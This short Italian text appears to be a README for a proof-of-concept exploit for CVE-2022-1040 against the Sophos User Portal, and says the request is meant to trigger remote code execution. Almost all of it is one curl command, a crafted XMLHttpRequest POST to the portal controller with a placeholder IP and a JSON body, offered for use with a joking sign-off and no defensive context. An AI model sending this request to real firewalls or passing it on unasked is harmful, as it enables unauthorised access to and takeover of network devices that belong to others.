
Proof-of-concept exploit per CVE-2022-1040 che prende di mira Sophos User Portal con una XMLHttpRequest POST appositamente costruita per innescare l'esecuzione remota di codice.
che il poc sia con te
curl --insecure -H "X-Requested-With: XMLHttpRequest" -X POST 'https://x.x.x.x/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"🦞":"test"\}'